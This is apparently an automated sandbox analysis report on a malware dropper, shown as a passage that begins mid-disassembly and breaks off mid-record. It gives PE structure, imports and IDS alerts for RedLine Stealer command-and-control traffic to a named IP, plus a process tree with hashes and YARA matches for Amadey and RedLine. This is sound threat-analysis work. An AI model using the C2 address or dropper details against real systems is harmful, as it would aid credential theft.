                                                                                                                                                                                                                                          mov edi, esi
                                                                                                                                                                                                                                          jmp 00007F47BCC77062h
                                                                                                                                                                                                                                          push 000003E8h
                                                                                                                                                                                                                                          call dword ptr [0040A188h]
                                                                                                                                                                                                                                          jmp 00007F47BCC77029h
                                                                                                                                                                                                                                          xor esi, esi
                                                                                                                                                                                                                                          inc esi
                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                          jne 00007F47BCC7705Ch
                                                                                                                                                                                                                                          push 0000001Fh
                                                                                                                                                                                                                                          call 00007F47BCC7757Bh
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          jmp 00007F47BCC7708Ch
                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                                                          jne 00007F47BCC7707Eh
                                                                                                                                                                                                                                          mov dword ptr [004088B0h], esi
                                                                                                                                                                                                                                          push 004010C4h
                                                                                                                                                                                                                                          push 004010B8h
                                                                                                                                                                                                                                          call 00007F47BCC771A6h
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          je 00007F47BCC77069h
                                                                                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                                                          mov eax, 000000FFh
                                                                                                                                                                                                                                          jmp 00007F47BCC77189h
                                                                                                                                                                                                                                          mov dword ptr [004081E4h], esi
                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                          jne 00007F47BCC7706Dh
                                                                                                                                                                                                                                          push 004010B4h
                                                                                                                                                                                                                                          push 004010ACh
                                                                                                                                                                                                                                          call 00007F47BCC77735h
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          mov dword ptr [000088B0h], 00000000h
                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000xb25f8.rsrc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xbf0000x888.reloc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                          .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                          .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .rsrc0xc0000xb30000xb2600False0.9483345742817099data7.915927904909951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .reloc0xbf0000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                          AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x24a340x35cdataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x2525c0x168dataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x255840x1e0dataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x257640x130dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x258940x150dataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x25b040x122dataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                                                                                                                                                                                          RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x2625c0x52edataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x26d580x592dataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x2779c0x4b2dataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x27c500x44adataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x2809c0x43edataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x288ac0x2fcdataRussianRussia
                                                                                                                                                                                                                                          RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0x28bb00x9491aMicrosoft Cabinet archive data, many, 608538 bytes, 2 files, at 0x2c +A "sEm51bM.exe" +A "nIp99Jf.exe", ID 1891, number 1, 25 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd4cc0x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd4d00x24dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd4f40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd4fc0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd5040x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd5080xcdataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd5140x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd5180xcdataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd5240x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd5280x5ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd5300x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xbd5380x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_GROUP_ICON0xbd5400xbcdataEnglishUnited States
                                                                                                                                                                                                                                          RT_VERSION0xbd5fc0x408dataEnglishUnited States
                                                                                                                                                                                                                                          RT_VERSION0xbda040x410dataRussianRussia
                                                                                                                                                                                                                                          RT_MANIFEST0xbde140x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                          ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                                                          KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                                                          GDI32.dllGetDeviceCaps
                                                                                                                                                                                                                                          USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                                                          msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                                                          COMCTL32.dll
                                                                                                                                                                                                                                          Cabinet.dll
                                                                                                                                                                                                                                          VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                                                                          RussianRussia
                                                                                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          193.233.20.17192.168.2.34139496992043234 02/19/23-02:32:23.476854TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          192.168.2.3193.233.20.174969941392043231 02/19/23-02:32:35.640007TCP2043231ET TROJAN Redline Stealer TCP CnC Activity496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          192.168.2.3193.233.20.174969941392043233 02/19/23-02:32:22.070574TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:21.699728012 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:21.722418070 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:21.722666979 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:22.070574045 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:22.093725920 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:22.137518883 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:23.452574015 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:23.476854086 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:23.528230906 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:30.630064011 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:30.654742002 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:30.654825926 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:30.654875994 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:30.654911995 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:30.769176960 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.411530972 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.435293913 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.497752905 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.539527893 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.562376976 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.562817097 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.607189894 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.923265934 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.946846008 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:32.982080936 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.005553961 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.060344934 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.148724079 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.171540022 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.171603918 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.172175884 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.215698957 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.239433050 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.279166937 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.316579103 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.339760065 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.388473988 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.851272106 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.874078035 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.874370098 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.919847012 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.987217903 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.010979891 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.019686937 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.043313980 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.044576883 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.067986965 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.099214077 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.122812986 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.169902086 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.239923000 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.263230085 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.310482979 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.436047077 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.463315964 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.465219021 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.489403963 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.501846075 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.525026083 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.576174021 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.616517067 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.639223099 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.639585018 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.640007019 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.665282965 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.716769934 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.723017931 CET496994139192.168.2.3193.233.20.17

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:02:31:55
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\21fvBVFMsn.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\21fvBVFMsn.exe
                                                                                                                                                                                                                                          Imagebase:0xa40000
                                                                                                                                                                                                                                          File size:764928 bytes
                                                                                                                                                                                                                                          MD5 hash:478E1C903CFCDA85ACDB9759AE80E155
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                          Start time:02:31:55
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                                                                                                                                                                                                                                          Imagebase:0x320000
                                                                                                                                                                                                                                          File size:571904 bytes
                                                                                                                                                                                                                                          MD5 hash:EE9CEC71CDD89A723F90D5013E963B02
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 69%, ReversingLabs
                                                                                                                                                                                                                                          • Detection: 55%, Virustotal, Browse
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                          Start time:02:31:56
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                                                                                                                                                                                                                                          Imagebase:0x10d0000
                                                                                                                                                                                                                                          File size:206848 bytes
                                                                                                                                                                                                                                          MD5 hash:EA0FADAB5F038CDB93F37EA867C62934
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 69%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:02:31:56
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe
                                                                                                                                                                                                                                          Imagebase:0x6e0000
                                                                                                                                                                                                                                          File size:11264 bytes
                                                                                                                                                                                                                                          MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 85%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                          Start time:02:32:04
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                          Imagebase:0x7ff630c50000
                                                                                                                                                                                                                                          File size:69632 bytes
                                                                                                                                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                          Start time:02:32:07
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe
                                                                                                                                                                                                                                          Imagebase:0x4e0000
                                                                                                                                                                                                                                          File size:179200 bytes
                                                                                                                                                                                                                                          MD5 hash:C9C03EC2426C8416841FD7E93BB9DC3D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Author: ditekSHen
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 96%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:02:32:13
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
